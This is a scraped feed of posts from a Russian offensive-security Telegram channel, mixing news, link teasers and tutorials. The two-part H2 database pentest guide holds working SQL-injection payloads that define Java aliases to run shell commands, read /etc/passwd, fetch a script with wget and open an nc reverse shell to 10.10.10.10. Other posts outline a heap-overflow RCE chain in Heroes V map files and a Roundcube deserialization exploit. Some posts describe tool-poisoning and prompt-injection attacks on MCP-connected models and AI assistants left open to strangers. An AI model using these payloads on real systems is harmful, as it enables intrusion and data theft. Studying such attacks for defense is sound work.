poxek | Unsorted

Telegram-канал poxek - Похек

14364

All materials published on the channel are for educational and informational purposes only. Чат: @poxek_chat Админ: @szybnev Рекламный менеджер: @not_savely Купить рекламу: https://telega.in/c/poxek РКН: https://clck.ru/3FsVhp

Subscribe to a channel

Похек

«Ваше лицо скомпрометировано!»

В одной из бизнес-центров, где расположен офис наших партнеров, внедрили две системы пропусков:
1. По одноразовому QR-коду
2. По биометрии, а именно лицу

И если с первой всё окей, работает как часы и вполне надежно, то со второй есть проблемы. Терминал с камерой для QR и лица - один и тот же, и лицо, как и QR, распознаются, судя по всему, одним ПО! Уже чувствуете подвох?

Для проверки QR достаточно считать пиксели и проверить одноразовый код в базе, а вот для проверки лица этого явно недостаточно. Ведь основа биометрии не секретность, как мы писали неоднократно ранее. Основа биометрии — качество проверки, умение отличить настоящее лицо от подделки!

Отличить настоящего человека от:
- Фотки на телефоне
- Распечатанного фото
- Человека в накладной маске
- Человека в тонкой (проводящей тепло) маске
И иных способов мимикрии.

Как вы понимаете, уже первую строчку терминал БЦ не прошел, бликующей фотографии лица на экране телефона оказалось достаточно, чтоб войти в БЦ. Никакой проверки на «живость» в помине нет. Притом что сотрудник уже входил и обратно не выходил. Малейший антифрод тоже отсутствовал.

Партнеры предъявили это охране, и как они отреагировали?
Заблокировали вход сотруднику по лицу, мотивировав тем, что «Ваше лицо скомпрометировано!». Видимо считая, что каждый должен ходить в парандже и приоткрывать свое секретное лицо исключительно на входе в БЦ.

Когда нам рассказали, мне было очень смешно, и я предложил в будущем сфоткать лицо начальника охраны и «скомпрометировать» и его. Интересно, какая будет реакция?

Читать полностью…

Похек

Сегодня мы погрузимся в ностальгию и разберем, как старенькая, но любимая многими игра "Герои Меча и Магии V" может стать лазейкой для выполнения вредоносного кода.

Вектор атаки: карты — это не то, чем кажутся
В "Героях V" есть редактор карт, с помощью которого игроки могут создавать свои миры и делиться ими. Эти карты имеют расширение .h5m, но на самом деле это обычные ZIP-архивы. Внутри такого архива лежит несколько файлов, но для нас самый интересный — name.txt. Этот файл содержит название карты, и игра считывает его, как только вы заходите в меню выбора карт для начала новой игры.

Игра использует собственную библиотеку для работы с ZIP-архивами. Когда вы открываете список карт, игра должна распаковать name.txt из каждого .h5m файла, чтобы показать вам их названия.

Уязвимость: переполнение кучи на доверии
Проблема возникает в процессе распаковки. Вот как это выглядит на техническом уровне:
➡️Выделение памяти: Игра смотрит на метаданные файла name.txt внутри ZIP-архива, а именно на поле m_UncompressedSize. Это поле говорит, сколько места понадобится для распакованного файла. На основе этого значения игра выделяет буфер в памяти (в куче) с помощью кастомного аллокатора H5_alloc.
➡️Распаковка: Затем вызывается функция Uncompress, которая использует библиотеку zlib, а конкретно функцию inflateBack. Эта функция распаковывает данные.
➡️Копирование: inflateBack вызывает специальную callback-функцию zlib_out, которая и копирует распакованные данные в тот самый буфер, который был выделен на первом шаге.

Ключевая уязвимость заключается в том, что игра слепо доверяет значению m_UncompressedSize из заголовка ZIP-файла. Что, если мы создадим вредоносный архив, где m_UncompressedSize будет маленьким (например, 0x800 байт), а реальный размер распакованных данных — гораздо больше (например, 0x2000 байт)? В этом случае zlib_out попытается записать 0x2000 байт в буфер размером 0x800 байт. Результат — классическое переполнение кучи (heap overflow).

Эксплуатация: от переполнения к RCE
Теперь самое интересное — как превратить это переполнение в выполнение своего кода.

Поиск цели: Наша задача — перезаписать что-то важное в памяти. Идеальная цель — указатель на таблицу виртуальных функций (vtable) какого-нибудь объекта. Если мы заменим этот указатель на свой, то при вызове метода этого объекта управление перейдет к нашему коду.

Исследователи обнаружили, что из-за особенностей работы кастомного аллокатора H5_alloc можно довольно предсказуемо разместить наш вредоносный буфер рядом с определенным объектом. С помощью скрипта для IDA Python они выяснили, что объект типа NGScene::CLightStateNode почти всегда находится на одном и том же расстоянии от буфера, выделяемого для name.txt.

➡️Построение цепочки: У игры не включена рандомизация адресного пространства (ASLR), так что адреса кода и данных известны заранее. Однако мы не контролируем стек напрямую, поэтому классический ROP (Return-Oriented Programming) не подходит. Вместо этого используется техника JOP/COP (Jump/Call-Oriented Programming).

Схема эксплойта выглядит так:
0️⃣Создается карта .h5m со специально подготовленным файлом name.txt. В его ZIP-заголовке указывается маленький размер, а внутри — большой объем данных (шеллкод).
1️⃣Когда игра пытается показать название карты, происходит переполнение кучи.
2️⃣Переполнение перезаписывает vtable объекта NGScene::CLightStateNode, указывая на первый гаджет в нашей JOP-цепочке.
3️⃣Когда игра пытается освободить этот объект, вызывается его деструктор через подмененную vtable, и управление передается нашему первому гаджету.
4️⃣Цепочка гаджетов выполняет "пивот" стека: указатель стека (ESP) перемещается так, чтобы он указывал на контролируемую нами область памяти внутри перезаписанного объекта.
5️⃣Далее выполняется стандартная ROP-цепочка, которая загружает kernel32.dll, находит адрес функции WinExec и запускает calc.exe.

Вуаля! При простом наведении на вредоносную карту в меню игры у пользователя запускается калькулятор, а мог бы запуститься любой другой вредоносный код.

🔗Источник

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Escплуатация. Повышение привилегий с использованием AD CS
#AD #ADCS #LSASS #Kerberosting #DCSync

Команда авторов взаимодействует с этичными хакерами в различных red‑team‑проектах, реализуемых для наших заказчиков. Пока хакеры занимаются поиском уязвимых мест и различных недостатков в системах заказчиков, они — аналитики — занимаются комплексным анализом системы, оценкой уязвимостей и их последствий в контексте угрозы для заказчика, составляем список рекомендаций и мер и представляем все обнаруженное хакерами и проанализированное ими в форме понятных отчетов. В процессе работы над подобными проектами они провели множество исследований инфраструктур и накопили знания о различных актуальных атаках — и хотят поделиться этими знаниями с экспертами или теми, кто просто заинтересован в информационной безопасности.

🔗 Читать дальше

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Claude vs ChatGPT + Codex: Кто лучше решит комплексную задачу? Тестируем 6 моделей
#vibecoding #chatgpt #claude #codex #o3 #gpt4.1 #sonnet4 #sonnet3.7

Со времени как вышел Claude 4 прошло пару недель. Весь этот срок я постоянно сравниваю эти модели в разных задачах. И говорят, что Claude 4 отлично справляется с кодом, что мы сейчас и проверим

Сравню их в работе с комплексной задачей, где нужно и код написать, и текст, да и интерфейс еще сверху. Все это я хочу сделать не через правильно выстроенный промпт, а дать моделям максимальную свободу достичь результата так, как они захотят

🔗 Читать дальше

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

😊 API Gateway как линия фронта в Web3

Внимание: CatSwap в этом тексте — не стартап и не “очередной ”, а наш pet-проект для иллюстрации. Он нужен, чтобы показать, как Web3-сервисы должны мыслить в части защиты API — не опираясь на бэкэнд, а начиная с Gateway.


В Web3 большинство угроз входит не через «модные» DeFi-примитивы, а через вполне классический API-интерфейс. Просто формат другой: не form-data, а подписанный JSON с маршрутом, суммой и временной меткой. CatSwap, как агрегатор, — типичный пример. Все транзакции, котировки, swap-запросы проходят через публичное API.

Чеклист по защите API Gateway

▫️ HTTPS (TLS 1.2+) + WAF
• Принудительное HTTPS;
• WAF / WAF с OWASP CRS, бот-контролем и Geo-ACL.

▫️ Аутентификация
• JWT в envoy.filters.http.jwt_authn;
• Web3-подписи (EIP-191/712) через Proxy-Wasm (X-Address + X-Signature);
• Challenge-nonce, защита от replay-атак.

▫️ Авторизация (OPA / ExtAuthz)
• RBAC/ABAC-политики по ролям, slippageTolerance, gasPrice, геопозиция, времени суток;
• Динамические политики Rego + GitOps-репозиторий.

▫️ JSON-валидация запросов
• OpenAPI-схемы → Envoy JSON Validator, ошибка 400 при несоответствии;
• Чёткое разделение обязательных и опциональных полей.

▫️ Rate Limit & QoS
/v1/quote ≤ 1000 r/m; /v1/swap ≤ 100 r/m;
• Circuit breaker, retry, max concurrent;
• Приоритет маршрутов, Kubernetes Resource Limits.

▫️ API Gateway (Envoy + Proxy-Wasm)
• JWT (RS256) через envoy.filters.http.jwt_authn;
• JSON Schema Validator — строгая валидация payload;
• Rate-limit, circuit breaker, retry с экспоненциальным backoff;
• ExtAuthz → ML-анализ;
• mTLS внутри кластера (Istio-SDS или Envoy native).

▫️ Логирование & мониторинг
• JSON Access Logs (path, key, user_id, latency, tx_hash);
• Prometheus (p95/p99, ошибки, RPS) / Grafana—дашборды;
• OpenTelemetry + Jaeger; трассировка end-to-end;
• GitOps-аудит конфигов (ArgoCD/Flux).

▫️ Management plane hardening
• Bastion-host с MFA для доступа к административным интерфейсам;
• Жёсткие IAM-роли и Just-In-Time elevation для операторов.

▫️ CI/CD & GitOps
• Инфраструктура как код (Terraform, Helm);
• ArgoCD синхронизация; PR-ревью, tfsec/checkov, canary-релизы.

▫️ Supply chain security & SBOM
• Генерация и хранение SBOM для всех контейнеров и зависимостей;
• Подпись артефактов (cosign/Sigstore) и верификация на этапе деплоя.

▫️ Контроль изменений и drift detection
• Policy as Code (OPA, Terraform Sentinel);
• Инструменты проверки конфигураций (tfsec, Checkov, Conftest).

▫️ ML-анализ в Gateway 💻
• Isolation Forest в Seldon Core; Envoy ExtAuthz вызывает /predict;
• Блокировка при score > 0.8; алёрты в SIEM/Slack.

▫️ API lifecycle & versioning
• Явное управление версиями API, deprecation-policy, backward-compatibility тесты;
• Тёмные и канареечные запуски (traffic mirroring) новых эндпоинтов.

▫️ Disaster recovery & multi-region failover
• Репликация Gateway в нескольких регионах; автоматический DNS-фейловер;
• Документированные RTO/RPO и регулярные drill-тесты.

▫️ Пентесты & Bug Bounty
• Ежеквартальные внешние пентесты API Gateway и RPC-узлов;
• Запуск программы Bug Bounty (HackerOne / Standoff / bizone) для непрерывного обнаружения уязвимостей.

▫️ План реагирования на инциденты (по просьбе SOC)
• Определённые playbook: detection → containment → eradication → recovery;
• SLA/TTR для критичных сервисов; регулярные учения.

▫️ Приватные RPC (PrivateLink / IAM)
• JSON-RPC узлы скрыты за VPC Endpoint (PrivateLink / PSC);
• Доступ по SigV4 / ACL; rate-limit и circuit breaker перед нодами.

▫️ HTTP-security headers
• HSTS (Strict-Transport-Security), CSP, X-Frame-Options, X-Content-Type-Options;
• Защита от clickjacking и MIME-sniffing.

▫️ Сегментация сети и ограничения доступа
• Kubernetes NetworkPolicies; NSG/Security Groups;
• Микросегментация: отдельные VPC/subnet для критичных сервисов.

🔫 А зачем

В общем, это не просто чеклист для галочки. Это попытка собрать разумную, масштабируемую и живучую архитектуру, в которой API Gateway — не прослойка между интернетом и микросервисами, а полноценная точка принятия решений.

#appsec

Читать полностью…

Похек

Под капотом Госуслуг: как защищают системы, от которых зависит работа цифрового государства
#госуслуги #compliance #ГОСТ #ГИС #аудит #аттестация

Предисловие от меня: про бумажную безопасность и нет, это не хрень бесполезная, как многие считают)

Цифровизация госсектора привела к появлению сервисов, которые упростили взаимодействие граждан с государством. Яркий пример — портал Госуслуг, работа которого опирается на обширную инфраструктуру государственных информационных систем (ГИС).

В России действуют сотни федеральных, региональных и муниципальных ГИС, без которых невозможно представить работу органов власти. Часть из них напрямую используется гражданами, другие работают в фоновом режиме, обеспечивая интеграцию и автоматизацию процессов. Кроме того, появляются информационные системы, которые формально не являются ГИС, но тесно с ними связаны.

Оборотной стороной цифровизации становятся риски кибербезопасности. В случае с ГИС ставки чрезвычайно высоки, ведь в таких системах агрегируются персональные данные миллионов пользователей и чувствительная для госструктур информация. Поэтому защита ГИС требует специфического подхода и регулирования со стороны ФСТЭК и ФСБ.

На связи Максим Кузнецов, руководитель отдела защиты информации ГИС в Бастионе. Сегодня расскажу об особенностях защиты ГИС и о том, с какими сложностями мы сталкиваемся в таких проектах.

🔗Читать полностью

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Данные на продажу: что происходит с информацией после утечек
#утечки #сливы #leak #leaks #РКН

Новости о крупных утечках данных больше никого не удивляют. Компании вкладывают миллионы в безопасность, проводят аудиты, но число таких инцидентов продолжает расти. Только в 2024 году Роскомнадзор зафиксировал 135 утечек — это более 710 миллионов записей о россиянах в базах данных. Но что происходит с данными после взлома? Куда они утекают? Кто и как их покупает?

Большинство новостей на тему утечек ограничиваются банальным «взломали, утекло, делайте выводы». Но утечка данных — это не конец истории, а только ее начало. После взлома данные начинают жить своей жизнью: их разбивают на части, объединяют с другими базами, разыгрывают на аукционах. Теневой рынок, построенный вокруг сбыта таких данных, напоминает отдельную экосистему, которая до сих пор слабо изучена даже среди ИБ-специалистов.

В этой статье разберем, как на практике выглядит жизненный цикл украденных данных. Представьте: вы — опытный специалист по киберразведке, помогающий компаниям справляться с последствиями утечек. Ранним июньским утром вас будит внезапный телефонный звонок. На другом конце провода — гендиректор ООО «Нас никогда не взломают». Судя по голосу, он явно встревожен...

🔗Читать полностью

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Ни один вывод с вашего сервера MCP не является безопасным
#MCP #AI #Anthropic #LLM #TPA #ATPA #FSP #pentest #research

Исследование CyberArk показало: MCP (Model Context Protocol) от Anthropic уязвим не только к классическим атакам Tool Poisoning (TPA), когда вредоносный код внедряют в описание инструмента, но и к Full-Schema Poisoning (FSP). Теперь атаковать можно любые поля схемы — имена параметров, типы, обязательные поля и даже новые незадокументированные элементы. Самое опасное — Advanced Tool Poisoning Attack (ATPA): вредоносная логика внедряется в вывод инструмента или сообщения об ошибках. LLM, считая их легитимными, может раскрывать чувствительные данные (например, приватные ключи) или выполнять вредоносные действия. Такие атаки сложно обнаружить — они могут активироваться только в продакшене и выглядеть безобидно на этапе тестирования. Вывод: доверять MCP-серверам нельзя, проверять нужно все поля и любые ответы инструментов

🔗Читать полностью

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Релиз Cursor 1.0
#vibecoding #coding #cursor #AI #MCP

TLDR: В этом релизе представлен BugBot для проверки кода, новую фичу memories, настройка MCP в один клик, поддержка Jupyter, backgound agent вышел из беты и новый UI настроек Cursor.

1️⃣BugBot
Раньше была фича с ручной проверкой pull request в git на наличие багов. Было удобно, но видимо многие забыли её тыкать. Теперь эта функция автоматическая, если есть какие-то баги, то можно тыкать Fix in Cursor уже в самом Gitlab/Github и вам откроет Cursor на десктопе с заготовленным промптом под конкретную проблему. Как настроить - читайте доку. Мне эта фича и раньше нравилась, т.к. она по мимо сообщения о потенциальном баге, писала вероятность его "правдивости".
Оно всё равно платное осталось. Триалка на 7 дней! Дальше тратится, как за использование Max моделей.

2️⃣Background Agent для всех
Сама по себе это фича, которая позволяла выполнять агентские промпты в фоне распараллельно. Но она была в бете и обязывала выключить Privacy режим, что я даже на своих личных проектах не хотел делать, ведь это означало 100% слив своей кодовой базы в Cursor. Пункт про Privacy к сожалению пока ешё действует, т.к. команде нужно получить максимум фидбеке о её работе. Но если хотите побаловаться, то активировать можно, либо CMD/Ctrl+E или по иконке облачке справа сверху.

3️⃣Обновление для Data Science. Поддержка Jupyter Notebooks
Я лично эту обнову не очень понимаю, т.к. мой мир и мир Data Science явно находятся по разным берегам, но: Агент теперь может создавать и редактировать несколько ячеек непосредственно в Jupyter, что является значительным улучшением для исследовательских задач и задач по изучению данных. Пока эта фича доступна только с моделями Sonnet.

4️⃣Memories
Чтобы было понятно, что это за фича. Вспомните когда OpenAI релизнуло в ChatGPT общую память между чатами и возможность её изменения. По сути очень схожая фича, но пока в бете. Возможно я пока не вижу её потенциал, но я выработал лайфхак, чтобы переносить память между чатами: Напиши summary нашего диалога из этого чата, чтобы я мог перенести всю важную информацию и в другой чат.

5️⃣Установка MCP в один клик
На мой взгляд и так не возникало проблем ставить MCP в Cursor. Я раньше писа пост про безопасность MCP ТУТ. Собственнно от них не отказываюсь и лаббирую, что запускать MCP сервера надо в контейнерах. Как устанавливаются и запускаются они в новой версии Cursor, я пока ещё не протестил. Если появится инфа, то дополню пост. А также появилась возможность OAuth для этих же MCP, где требуется авторизация. Наверное чтобы не хранить API ключи локально.

6️⃣Улучшение ответов в чате
Эта обнова понравится людям-визуалам, которые любят таблички и диаграмки. Собственно это и добавляется прямо в чат, если попросить их сгенерировать. create Mermaid diagrams или Markdown tables.

7️⃣Минорное — обновление UI настроек Cursor IDE
Самое вкусное из этого на мой взгляд - это dashboard потраченных запросов, usage-based и сколько строк кода написано AI.


🔗Changelog

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Гайд по пентесту СУБД H2. Первая часть
#H2 #Java #pentest #research #SQLi

ЧАСТЬ 1 - ЧАСТЬ 2

Родители, закройте детям глаза, дальше будет Java)

➡️Начнём с теории:
H2 — это легковесная, кроссплатформенная система управления реляционными базами данных с открытым исходным кодом, полностью написанная на Java. Она может работать как во встроенном режиме (embedded), так и в режиме клиент-сервер, поддерживает хранение данных в памяти (in-memory) и на диске, что делает её идеальным выбором для разработки, тестирования и небольших production-проектов.

Я думаю большинство с ней никогда не сталкивалось, вот и я вчера впервые с ней повстречался. В ходе ресерча ноликов ноликов в одном Java проекте, я дошёл до потенциальной SQLi и я решил сразу пойти покрутить SQLi > RCE. Попробовав дефолтные векторы из постгри (чисто на рефлексе), понял что оно не работает(

Пошёл читать доку и оказалось, что прямого вектора до RCE, как в популярных СУБД типа PostgreSQL или MySQL - нет. Пошёл читать доку и ...пригрустнул, т.к. судя по сайту, мне предстояла попа-боль и костыльные извращенства, что собственно и произошло.

Верификация наличия SQLi идёт по классике:

something' OR 1=1; --
# Получаем 200 OK

something' OR 1=2; --
# Получаем ошибку

На этом даже останавливаться не будем.

В чём основаная проблема? Нет явного фунционала для выполнения команд на системе. Поэтому давайте сами напишем себе функции для RCE))

🕺 Я нашёл 2 вектора, как можно выполнять RCE в этой СУБД:
1️⃣ Менее удобный вектор, но прямолинейный. Создаём функцию и вызываем её, заменяя какие-нибудь данные в таблице, которые мы видим на странице.
import java.io.IOException;

public class Main {

public static void main(String[] args) throws IOException {
// Вызываем метод shell_exec() и выводим результат в консоль
System.out.println(shell_exec());
}

static String shell_exec() throws java.io.IOException {
// Выполняем команду "id" и создаём Scanner для чтения её вывода

java.util.Scanner cmd_output = new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A"); // Устанавливаем разделитель так, чтобы Scanner читал весь ввод целиком

// Если есть данные в выводе команды, возвращаем их, иначе — пустую строку
return cmd_output.hasNext() ? cmd_output.next() : "";
}
}


Итоговая нагрузка будет выглядеть вот так:
something' OR 1=1; DROP ALIAS IF EXISTS exec_cmd; CREATE ALIAS exec_cmd AS 'String shell_exec() throws java.io.IOException {
java.util.Scanner cmd_output = new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\\\A");
return cmd_output.hasNext() ? cmd_output.next() : "";
}'; UPDATE comments SET comment = exec_cmd() WHERE id = 13c60101-8142-42df-bebd-fb5905673c41; --


И проверяем результаты на странице. Содержимое комментария с этим UUID должно было замениться на вывод команды id, но если что-то не сработало, то будет пустой комментарий. Почему может не сработать? Возможно урезанное окружение, а может права выставлены корректно и СУБД не может выполнять системные команды. Попробуйте другие команды, если вдруг не получилось.

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

#note

Oracle давно закрыла возможность скачивания своих файлов без авторизации. Я сейчас снова с этим столкнулся и нашёл способ, как это обойти:

1. Простой способ. Обход через куку

wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie"  https://download.oracle.com/java/17/archive/jdk-17.0.12_linux-x64_bin.tar.gz


2. Если вам нужны более старые версии или какие-то Java SE Dev Kit'ы, где сайт не отдаёт прямую ссылку на скачивание, то можно проверить наличие их в зеркале Huawei
https://mirrors.huaweicloud.com/java/jdk/

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Old, but gold

Meme by @k0_oat

🌚 @poxek

Читать полностью…

Похек

Эти доклады отметил для себя как полезные и годные. Но другие доклады тоже хороши.

На самом деле давно не был на конфе, когда не понимаешь даже половину слов спикера и ... меня это радует, т.к. это значит есть развиваться)

Читать полностью…

Похек

Следующий спикер уже на сцене! Дмитрий Рыбалка, Lamoda Tech. "Talos Linux в production: без SSH и с удовольствием".

Читать полностью…

Похек

Дмитрий Евдокимов переходит к своему докладу: "Неочевидные и непонятные моменты безопасности Kubernetes".

Читать полностью…

Похек

Интересный опыт, правда такое практиковали уже лет 5-10 назад точно

Читать полностью…

Похек

Cellebrite + Corellium = 😧
#mobile #Apple #cellebrite #corellium #DevSecOps

Cellebrite объявила о соглашении по приобретению Corellium — лидера в области виртуализации Arm-устройств. Эта сделка объединяет передовые технологии и экспертизу обеих компаний, чтобы вывести на новый уровень исследования уязвимостей, анализ вредоносного ПО, DevSecOps для смарт-устройств и мобильный пентест. Благодаря этому решению клиенты из госсектора, обороны, разведки и частного бизнеса получат:
➡️Более быстрое выявление уязвимостей и эксплойтов для мобильных устройств
➡️Возможность интерактивно работать с виртуальными устройствами, что существенно ускорит расследования и разработку
➡️Повышенную эффективность и скорость DevSecOps для всех устройств на базе Arm
➡️Динамичный, нативный мобильный пентест

Corellium интегрирует свою уникальную платформу виртуализации, позволяя специалистам буквально «гулять» по устройству, исследовать его содержимое без риска изменения данных. Основатель Corellium Крис Уэйд станет новым CTO Cellebrite. Сделка оценивается в $170 млн наличными плюс до $30 млн при достижении определённых KPI за два года. Ожидается, что приобретение расширит присутствие Cellebrite в обоих секторах рынка, а также усилит её платформу цифровых расследований и решения для безопасной разработки IoT, мобильных и автомобильных систем. Закрытие сделки запланировано на лето 2025 года, после одобрения регуляторов.

🔗Источник

Также нашёл статью с историями, как взламывали смартфоны alice_0byte1/bTEaEDUa4m9">ВОТь. Автор статьи админ канала

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

мммммммммммммммммм, вкуснятина

Читать полностью…

Похек

CI/CD под прицелом: реальные сценарии атак и методы противодействия
#CICD #DevSecOps #AppSec #IAM #cloud #облако #безопаснаяразработка

Почему CI/CD так важен? Он представляет собой автоматизированный конвейер сборки и доставки ПО и, если говорить в контексте безопасности, существует целый ряд критичных инцидентов безопасности, например внедрение бэкдоров в ПО, подмена артефактов (supply chain), утечка чувствительных данных клиентов, компрометация deployment environment и так далее.

🔗 А если посмотреть на проблемы в контексте разработки публичного облака?

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Один из подписчиков задал вопрос в чате, какие у кого пет проекты. Пишите в комментариях, что пишите, ссылки на репозитории, если оно паблик, накидаем звездочек) Также расскажите, почему выбрали такой пет проект и какая мотивация его развивать.

А если нет пет проектов, то пофантазируйте, что хотелось бы написать)

Прочитаю все комменты)

🌚 @poxek

Читать полностью…

Похек

Новые атаки GOFFEE: разбор Kill Chain и анализ вредоносного ПО
#reverse #malware #killchain #forensic #форензика

В прошлом и нынешнем году коллеги из «Лаборатории Касперского» и BI.Zone рассказывали о группировке GOFFEE (Paper Werewolf). В конце мая автор статьи снова фиксировали ее активность, но немного в другом обличии — можно сказать, в новой овечьей шкуре. Автор статьи Никита Полосухин, ведущий аналитик центра мониторинга и реагирования на кибератаки, и я расскажу, как сейчас действует GOFFEE и как обнаружить их присутствие в инфраструктуре.

Что изменилось?
Итак, сначала к главному:

У вредоносного документа во вложении фишингового письма имеется уязвимость загрузки удаленных шаблонов СVE-2017-0199. Полезная нагрузка, как и ранее, находится в самом документе, закодированная в base64, но вредоносный макрос, который запускает ее, теперь скачивается в шаблоне.

PowerModul загружает основную нагрузку в память через [System.Reflection.Assembly]::Load, что не встречалось в атаках этой группировки в прошлом.

🔗А теперь — разбор.

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

🔥 9.9 Critical
Post Auth RCE для Roundсube

Небезопасная десериализация. Инжектится через GET-параметр _from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения.

?_task=settings&_action=upload&_from=mail%2Finbox


Пошагово, как работает эксплоит:
1. Подменяет _from сериализованным объектом.
2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через rcube_pgp_engine → Crypt_GPG_Engine.
4. Во время вызова GPG-логики, Roundcube вызывает unserialize().
5. Триггерится код из первого шага

exploit // nuclei // research

Читать полностью…

Похек

В кроличьей норе. Штурмуем отладочную консоль «Яндекс Станции»
#IDA #reverse #Яндекс #IoT #железо #hardware

Эта статья появи­лась в про­цес­се ревер­са про­шивок «Яндекс Стан­ций». Автор про­вел реверс U-Boot про­цес­сора умной колон­ки и соз­дал ути­литу для его извле­чения из рас­шифро­ван­ного заг­рузчи­ка. Спо­соб уни­вер­сален для всех подоб­ных устрой­ств и, воз­можно, дру­гих гад­жетов с чипом Amlogic.

Раз­работан­ный мной метод подой­дет для:
➡️«Стан­ции Mini2» (YNDX-00020/21);
➡️«Стан­ции Lite» (YNDX-00025);
➡️«Стан­ции Max» (YNDX-00053/0008);
➡️дру­гих устрой­ств на Amlogic S905X2 (G12) и A113X (AXG).

В про­цес­се автор рас­ска­жу о паре инте­рес­ных пла­гинов для IDA: с помощью Diaphora мы поза­имс­тву­ем информа­цию из схо­жего опен­сор­сно­го про­екта, а FindCrypt поможет нам отыс­кать крип­тогра­фичес­кие кон­стан­ты.

🔓 Читать далее

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Гайд по пентесту СУБД H2. Вторая часть
#H2 #Java #pentest #research #SQLi

ЧАСТЬ 1 - ЧАСТЬ 2

2️⃣ Удобный, но более жирный по коду вектор
Ещё в прошлом примере мы делали unalias на возможно существующую команду, на всякий случай. Теперь же мы создадим свой alias и будем его использовать.

   CREATE ALIAS EXEC AS
'String e(String cmd) throws java.io.IOException {
// Формируем массив аргументов для выполнения команды в bash:
String[] c = {"/bin/bash", "-c", cmd};

// Запускаем процесс с указанной командой
Process p = Runtime.getRuntime().exec(c);

// Получаем поток вывода (stdout) запущенного процесса
java.io.InputStream stdIn = p.getInputStream();
// Оборачиваем InputStream в InputStreamReader для чтения символов
java.io.InputStreamReader isr = new java.io.InputStreamReader(stdIn);
// Оборачиваем InputStreamReader в BufferedReader для построчного чтения
java.io.BufferedReader br = new java.io.BufferedReader(isr);

// Переменная для накопления всего вывода команды
String result = "";
// Временная переменная для чтения текущей строки
String line = "";

// Считываем строки из вывода процесса до тех пор, пока они есть
while ((line = br.readLine()) != null)
// Добавляем каждую строку к результату (без перевода строки)
result += line;

// Возвращаем весь накопленный вывод команды как одну строку
return result;
}';

По сути мы напрогали себе shell на java))

Дальше мы можем уже щеголять нашей оболочкой в запросах по полной.
something' CALL EXEC('cat /etc/passwd'); --


➡️Как получить reverse shell?
Тут уже по классике cmd inj)
# сначала пишем на rev shell в файл. Как пример:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.10 9001 >/tmp/f" > shell.sh

Если не работает этот revshell, то попробуйте любой другой с сайта revshells.com
Далее поднимаем python3 http.server в папке, где хранится shell.sh

Далее идём снова в Repeater и скачиваем файл на атакуемую систему
CALL EXEC('wget http://10.10.10.10:8080/shell.sh -O /tmp/shell.sh');

Выдаём права
CALL EXEC('chmod +x /tmp/shell.sh');

Запускаем у себя лисенер, после на атакуемой тачке рев шелл
CALL EXEC('bash /tmp/shell.sh');


Проверяем консоль, должена была появится сессия. Дальше уже можете делать privesc по ситуации)

P.s. в 2019 году был репорт на скулю в H2 в dotCMS
https://www.sonarsource.com/blog/dotcms515-sqli-to-rce/

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…

Похек

Как AI-ассистенты открывают всему миру вашу почту и календарь

Всем привет!
Сегодня безумно популярна тема различных AI-агентов и в частности персональных AI-помощников, эдаких «Джарвисов» на минималках.

Эти помощники умеют читать и отправлять почту, ставить встречи в календарь и напоминать нам о них. И все это через удобный и привычный Телеграм!

Офигенно удобно, полезно и всячески ускоряет и упрощает нам жизнь! Если бы не одно но..

О том как создать такого ассистента и подключить его к своей почте есть огромное количество материалов, особенно видео на Youtube. Я посмотрел 10 наиболее популярных видео, у которых в сумме набирается около 700 000 просмотров.. И во всех есть один и тот же косяк!

Из-за неправильной настройки телеграм-тригера написать вашему «Джарвису» может кто угодно! И абсолютно также получить данные о письмах, контактах, встречах, написать письмо всем контактам и т.д. Любой человек, кто найдет вашего бота может получать любые данные! А учитывая, что многие сервисы осуществляют сброс пароля через подтверждение на почту, это может быть еще интереснее!!

Одна маленькая, скрытая настройка ставит под очень большой удар всю конфиденциальную информацию, что у нас есть 🎉

Я написал об этом небольшую статью и даже записал коротенькое видео, которое показывает, как это работает!

Надеюсь вам будет интересно узнать поподробнее, как это работает и как сделать вашего «Джарвиса» только вашим :)

До связи!

#aishe4ka #aiassistant #n8n

Читать полностью…

Похек

Подборка райтапов на #bootcamp #standoff365

🗂️Задание
- [web-1-1] Удаленное выполнение кода (RCE) на узле library.edu.stf
